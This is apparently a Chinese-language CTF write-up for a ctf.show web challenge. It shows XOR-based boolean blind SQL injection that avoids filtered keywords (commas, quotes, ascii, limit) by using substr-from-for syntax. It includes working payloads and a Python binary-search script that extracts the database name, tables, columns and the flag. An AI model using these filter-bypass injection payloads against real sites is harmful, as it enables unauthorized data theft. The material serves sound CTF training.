输入1^1^1:
输入1^0^1:
参数处过滤了limit、+、单引号、逗号、ascii等关键字,因此考虑使用substr((database())from({})for(1))的形式去绕过。
id=1^(ord(substr((database())from(1)for(1)))>23)^1
正常回显(1^1^1),说明数据库名的第一个字符的ascii码大于23。
id=1^(ord(substr((database())from(1)for(1)))>123)^1
无回显(1^0^1),说明数据库名的第一个字符的ascii码小于123。
尝试二分法盲注,脚本如下:
import requests
url = ' http://2f7bbe27-e7d3-4b53-848f-77366c18e51b.chall.ctf.show/index.php?id=1'
flag = ''
for i in range(1, 50):
high = 127
low = 32
mid = (high+low)//2
while high > low:
payload = "^(ord(substr((database())from({})for(1)))>{})^1".format(i, mid)
# payload = "^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)in(database()))from({})for(1)))>{})^1".format(i,mid)
# payload = "^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)in(0x666c6167))from({})for(1)))>{})^1".format(i,mid)
# payload = "^(ord(substr((select(group_concat(flag))from(web1.flag))from({})for(1)))>{})^1".format(i,mid)
s = requests.get(url=url+payload)
if 'Rudyard' in s.text:
low = mid+1
else:
high = mid
mid = (high+low)//2
flag += chr(mid)
print(flag)
